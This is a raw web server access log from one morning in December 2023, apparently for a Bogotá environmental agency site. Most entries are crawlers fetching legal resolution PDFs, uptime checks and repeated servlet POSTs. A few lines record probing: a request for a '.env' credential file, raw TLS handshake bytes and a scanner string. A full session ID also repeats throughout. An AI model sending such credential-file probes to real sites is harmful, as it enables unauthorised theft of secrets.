201.245.192.253 - - [20/Dec/2023:03:36:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38507
156.59.198.135 - - [20/Dec/2023:03:36:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/0676.pdf HTTP/1.0" 200 355479
201.245.192.253 - - [20/Dec/2023:03:36:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36516
201.245.192.253 - - [20/Dec/2023:03:36:59 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
156.59.198.136 - - [20/Dec/2023:03:37:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/0995.pdf HTTP/1.0" 200 88144
35.91.132.1 - - [20/Dec/2023:03:37:24 -0500] "GET / HTTP/1.1" 200 319
156.59.198.135 - - [20/Dec/2023:03:37:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RESOLUCION%201561%20DE%202004.PDF HTTP/1.0" 200 716287
201.245.192.253 - - [20/Dec/2023:03:37:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
157.55.39.204 - - [20/Dec/2023:03:37:45 -0500] "GET /portaldeninos/wp-content/uploads/2020/03/arbolitos.gif HTTP/1.1" 200 1515203
156.59.198.135 - - [20/Dec/2023:03:37:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/0996.pdf HTTP/1.0" 200 90645
156.59.198.135 - - [20/Dec/2023:03:38:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RESOLUCION%20156%20DE%202004.PDF HTTP/1.0" 200 947266
172.22.2.4 - - [20/Dec/2023:03:36:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [20/Dec/2023:03:38:38 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.135 - - [20/Dec/2023:03:38:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RESOLUCION%20449%20DE%202004.PDF HTTP/1.0" 200 214892
201.245.192.253 - - [20/Dec/2023:03:39:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
156.59.198.135 - - [20/Dec/2023:03:39:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RESOLUCION%201575%20DE%202004.PDF HTTP/1.0" 200 326821
172.22.2.4 - - [20/Dec/2023:03:37:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57304
156.59.198.135 - - [20/Dec/2023:03:39:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RESOLUCION%201467%20DE%202004.PDF HTTP/1.0" 200 256699
47.128.31.157 - - [20/Dec/2023:03:40:06 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202007%2FRES%202007%20501%20AL%20600%2F&order=asc&sort=size HTTP/1.1" 200 26888
47.128.31.157 - - [20/Dec/2023:03:40:07 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
47.128.31.157 - - [20/Dec/2023:03:40:07 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
34.222.70.186 - - [20/Dec/2023:03:40:22 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [20/Dec/2023:03:40:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38507
172.22.2.4 - - [20/Dec/2023:03:40:35 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1018
201.245.192.253 - - [20/Dec/2023:03:40:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36516
201.245.192.253 - - [20/Dec/2023:03:41:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:03:40:35 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [20/Dec/2023:03:42:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
201.245.192.253 - - [20/Dec/2023:03:43:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [20/Dec/2023:03:43:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Dec/2023:03:42:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Dec/2023:03:44:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [20/Dec/2023:03:43:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56868
201.245.192.253 - - [20/Dec/2023:03:45:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [20/Dec/2023:03:46:15 -0500] "GET /BLA/resoluciones/AUTOS%202023/0472.pdf HTTP/1.1" 200 338140
216.244.66.195 - - [20/Dec/2023:03:46:56 -0500] "GET /BLA/resoluciones/AUTOS%202023/3071.pdf HTTP/1.1" 200 366338
201.245.192.253 - - [20/Dec/2023:03:47:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:03:47:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
216.244.66.195 - - [20/Dec/2023:03:47:38 -0500] "GET /BLA/resoluciones/AUTOS%202023/3379.pdf HTTP/1.1" 200 1861002
216.244.66.195 - - [20/Dec/2023:03:48:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3508.pdf HTTP/1.1" 200 297646
216.245.221.92 - - [20/Dec/2023:03:48:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:03:49:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [20/Dec/2023:03:49:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0404.pdf HTTP/1.1" 200 274663
216.244.66.195 - - [20/Dec/2023:03:49:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2296.pdf HTTP/1.1" 200 339950
172.22.2.4 - - [20/Dec/2023:03:48:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [20/Dec/2023:03:50:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2416.pdf HTTP/1.1" 200 444182
172.22.2.4 - - [20/Dec/2023:03:49:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60497
47.128.49.177 - - [20/Dec/2023:03:50:57 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
172.22.2.4 - - [20/Dec/2023:03:50:57 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
47.128.49.177 - - [20/Dec/2023:03:50:57 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
172.22.2.4 - - [20/Dec/2023:03:50:57 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17583
47.128.49.177 - - [20/Dec/2023:03:50:56 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202017%2F&order=desc&sort=size HTTP/1.1" 200 287000
172.22.2.4 - - [20/Dec/2023:03:50:59 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
201.245.192.253 - - [20/Dec/2023:03:51:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:03:51:00 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [20/Dec/2023:03:51:00 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
47.128.49.177 - - [20/Dec/2023:03:51:00 -0500] "GET /BLA/resoluciones/dlf/archive.png HTTP/1.1" 200 632
216.244.66.195 - - [20/Dec/2023:03:51:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3278.pdf HTTP/1.1" 200 392890
47.128.19.178 - - [20/Dec/2023:03:51:15 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202007%2FRES%202007%20801%20AL%20900%2F&order=asc&sort=date HTTP/1.1" 200 26642
47.128.19.178 - - [20/Dec/2023:03:51:16 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
47.128.19.178 - - [20/Dec/2023:03:51:16 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
216.244.66.195 - - [20/Dec/2023:03:51:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3456.pdf HTTP/1.1" 200 294755
216.244.66.195 - - [20/Dec/2023:03:52:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3619.pdf HTTP/1.1" 200 294426
201.245.192.253 - - [20/Dec/2023:03:52:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
201.245.192.253 - - [20/Dec/2023:03:53:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [20/Dec/2023:03:53:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3889.pdf HTTP/1.1" 200 460608
157.55.39.9 - - [20/Dec/2023:03:53:07 -0500] "GET /BLA/resoluciones/AUTOS%202023/4269.pdf HTTP/1.1" 200 1614225
216.245.221.92 - - [20/Dec/2023:03:53:38 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.3 - - [20/Dec/2023:03:53:52 -0500] "GET /secretaria-de-ambiente-y-universidad-de-la-salle-firman-acuerdo-de-conservacion-en-17-hectareas.html HTTP/1.1" 200 990
157.55.39.9 - - [20/Dec/2023:03:53:55 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
201.245.192.253 - - [20/Dec/2023:03:55:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
52.167.144.235 - - [20/Dec/2023:03:55:31 -0500] "GET /www.ambientebogota.gov.co/ HTTP/1.1" 404 1049
172.22.2.4 - - [20/Dec/2023:03:54:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Dec/2023:03:54:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60905
201.245.192.253 - - [20/Dec/2023:03:57:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:03:57:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
47.128.25.29 - - [20/Dec/2023:03:57:34 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
47.128.25.29 - - [20/Dec/2023:03:57:34 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
47.128.25.29 - - [20/Dec/2023:03:57:33 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202007%2FRES%202007%204001%20AL%204100%2F&order=asc&sort=date HTTP/1.1" 200 26864
47.128.56.191 - - [20/Dec/2023:03:57:53 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
47.128.56.191 - - [20/Dec/2023:03:57:53 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
47.128.56.191 - - [20/Dec/2023:03:57:52 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202011%2F&order=desc&sort=size HTTP/1.1" 200 225227
216.245.221.92 - - [20/Dec/2023:03:58:37 -0500] "HEAD / HTTP/1.1" 200 -
47.128.48.219 - - [20/Dec/2023:03:58:40 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
47.128.48.219 - - [20/Dec/2023:03:58:40 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
47.128.48.219 - - [20/Dec/2023:03:58:39 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202007/RES%202007%20101%20AL%20200/&sort=name&order=desc HTTP/1.1" 200 26930
201.245.192.253 - - [20/Dec/2023:03:59:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
173.252.107.7 - - [20/Dec/2023:03:59:03 -0500] "GET /crisis-climatica-distrito-firmo-alianza-para-preservar-la-seguridad-hidrica-de-bogota-y-la-region.html HTTP/1.1" 200 1075
201.245.192.253 - - [20/Dec/2023:04:01:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:03:59:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:04:02:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
172.22.2.4 - - [20/Dec/2023:04:00:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53508
201.245.192.253 - - [20/Dec/2023:04:03:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
157.55.39.10 - - [20/Dec/2023:04:03:08 -0500] "GET /BLA/resoluciones/AUTOS%202023/8579.pdf HTTP/1.1" 200 336728
216.245.221.92 - - [20/Dec/2023:04:03:37 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [20/Dec/2023:04:04:01 -0500] "GET /robots.txt HTTP/1.1" 404 1018
157.55.39.6 - - [20/Dec/2023:04:04:16 -0500] "GET /BLA/resoluciones/AUTOS%202023/4413.pdf HTTP/1.1" 200 396743
157.55.39.6 - - [20/Dec/2023:04:04:56 -0500] "GET /Publicaciones/2023EE247964.pdf HTTP/1.1" 404 228
201.245.192.253 - - [20/Dec/2023:04:05:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
157.55.39.49 - - [20/Dec/2023:04:05:01 -0500] "GET /BLA/resoluciones/AUTOS%202023/4724.pdf HTTP/1.1" 200 653977
201.245.192.253 - - [20/Dec/2023:04:07:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
162.55.170.174 - - [20/Dec/2023:04:07:07 -0500] "GET / HTTP/1.1" 200 319
162.55.170.174 - - [20/Dec/2023:04:07:07 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [20/Dec/2023:04:07:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
172.22.2.4 - - [20/Dec/2023:04:05:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Dec/2023:04:06:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60905
216.245.221.92 - - [20/Dec/2023:04:08:37 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:04:09:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:04:11:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:04:12:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
201.245.192.253 - - [20/Dec/2023:04:13:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:04:11:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [20/Dec/2023:04:13:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Dec/2023:04:12:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60905
201.245.192.253 - - [20/Dec/2023:04:15:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:04:16:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38500
201.245.192.253 - - [20/Dec/2023:04:16:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36519
201.245.192.253 - - [20/Dec/2023:04:17:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:04:17:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
216.245.221.92 - - [20/Dec/2023:04:18:37 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.59 - - [20/Dec/2023:04:18:49 -0500] "GET /BLA/resoluciones/AUTOS%202023/4485.pdf HTTP/1.1" 200 398538
201.245.192.253 - - [20/Dec/2023:04:19:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:04:17:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Dec/2023:04:18:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60497
201.245.192.253 - - [20/Dec/2023:04:20:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38500
201.245.192.253 - - [20/Dec/2023:04:20:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36519
201.245.192.253 - - [20/Dec/2023:04:21:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
207.46.13.54 - - [20/Dec/2023:04:21:52 -0500] "GET /BLA/resoluciones/AUTOS%202023/3620.pdf HTTP/1.1" 200 395975
157.55.39.204 - - [20/Dec/2023:04:21:59 -0500] "GET /BLA/resoluciones/AUTOS%202023/3894.pdf HTTP/1.1" 200 886441
201.245.192.253 - - [20/Dec/2023:04:22:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
201.245.192.253 - - [20/Dec/2023:04:23:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [20/Dec/2023:04:23:37 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.204 - - [20/Dec/2023:04:23:58 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
35.204.252.208 - - [20/Dec/2023:04:24:44 -0500] "GET /las-tres-caminatas-para-cerrar-el-ano-entre-la-naturaleza.html HTTP/1.1" 200 776
172.22.2.4 - - [20/Dec/2023:04:23:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:04:25:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:04:24:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60905
168.232.15.118 - - [20/Dec/2023:04:26:23 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [20/Dec/2023:04:26:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38500
201.245.192.253 - - [20/Dec/2023:04:26:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36519
201.245.192.253 - - [20/Dec/2023:04:27:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [20/Dec/2023:04:27:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
216.245.221.92 - - [20/Dec/2023:04:28:37 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.9 - - [20/Dec/2023:04:28:59 -0500] "GET /Publicaciones/2023EE255870.pdf HTTP/1.1" 404 228
201.245.192.253 - - [20/Dec/2023:04:29:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
207.46.13.150 - - [20/Dec/2023:04:29:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/8724.pdf HTTP/1.1" 200 368947
157.55.39.49 - - [20/Dec/2023:04:29:30 -0500] "GET /BLA/resoluciones/AUTOS%202023/4300.pdf HTTP/1.1" 200 1005206
66.249.66.19 - - [20/Dec/2023:04:29:35 -0500] "GET /BLA/resoluciones/AUTOS%202012/2566.pdf HTTP/1.1" 200 505067
168.119.52.80 - - [20/Dec/2023:04:29:48 -0500] "GET / HTTP/1.1" 200 319
168.119.52.80 - - [20/Dec/2023:04:29:50 -0500] "GET / HTTP/1.1" 200 4720
66.249.66.19 - - [20/Dec/2023:04:29:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8564.pdf HTTP/1.1" 200 648939
66.249.66.20 - - [20/Dec/2023:04:30:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5481.pdf HTTP/1.1" 200 499241
201.245.192.253 - - [20/Dec/2023:04:30:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38500
201.245.192.253 - - [20/Dec/2023:04:30:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36519
172.22.2.4 - - [20/Dec/2023:04:29:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:04:31:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [20/Dec/2023:04:29:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58562
201.245.192.253 - - [20/Dec/2023:04:32:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
201.245.192.253 - - [20/Dec/2023:04:33:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [20/Dec/2023:04:33:24 -0500] "GET /BLA/resoluciones/AUTOS%202020/2451.pdf HTTP/1.1" 200 340395
216.245.221.92 - - [20/Dec/2023:04:33:37 -0500] "HEAD / HTTP/1.1" 200 -
198.235.24.200 - - [20/Dec/2023:04:33:51 -0500] "\x16\x03\x01" 400 226
198.235.24.200 - - [20/Dec/2023:04:33:51 -0500] "\x16\x03\x01" 400 226
157.55.39.9 - - [20/Dec/2023:04:34:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5669.pdf HTTP/1.1" 304 -
216.244.66.195 - - [20/Dec/2023:04:34:11 -0500] "GET /BLA/resoluciones/AUTOS%202023/3187.pdf HTTP/1.1" 200 439555
216.244.66.195 - - [20/Dec/2023:04:34:52 -0500] "GET /BLA/resoluciones/AUTOS%202023/3867.pdf HTTP/1.1" 200 634449
201.245.192.253 - - [20/Dec/2023:04:35:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
123.126.68.27 - - [20/Dec/2023:04:35:25 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [20/Dec/2023:04:35:51 -0500] "GET /BLA/resoluciones/AUTOS%202010/5392.pdf HTTP/1.1" 200 1930025
192.241.213.42 - - [20/Dec/2023:04:35:52 -0500] "MGLNDD_190.27.245.106_80" 501 953
172.22.2.4 - - [20/Dec/2023:04:34:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Dec/2023:04:36:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38500
216.244.66.195 - - [20/Dec/2023:04:36:41 -0500] "GET /BLA/resoluciones/AUTOS%202010/6600.pdf HTTP/1.1" 200 151757
201.245.192.253 - - [20/Dec/2023:04:36:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36519
201.245.192.253 - - [20/Dec/2023:04:37:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [20/Dec/2023:04:37:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201996/0086.pdf HTTP/1.1" 200 77889
201.245.192.253 - - [20/Dec/2023:04:37:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37894
172.22.2.4 - - [20/Dec/2023:04:35:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60905
216.244.66.195 - - [20/Dec/2023:04:37:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0076.pdf HTTP/1.1" 200 474361
216.244.66.195 - - [20/Dec/2023:04:38:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0552.pdf HTTP/1.1" 200 238813
216.245.221.92 - - [20/Dec/2023:04:38:37 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [20/Dec/2023:04:38:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1778.pdf HTTP/1.1" 200 637429
201.245.192.253 - - [20/Dec/2023:04:39:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [20/Dec/2023:04:39:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2053.pdf HTTP/1.1" 200 315259
216.244.66.195 - - [20/Dec/2023:04:39:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2507.pdf HTTP/1.1" 200 1239470
216.244.66.195 - - [20/Dec/2023:04:40:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3140.pdf HTTP/1.1" 200 1305170
201.245.192.253 - - [20/Dec/2023:04:40:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38500
201.245.192.253 - - [20/Dec/2023:04:40:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36519
201.245.192.253 - - [20/Dec/2023:04:41:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65f92fa67ce9340589b498a1304d31ae2.e3iSbxaKaheRe34Qc38TbN0Nb41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
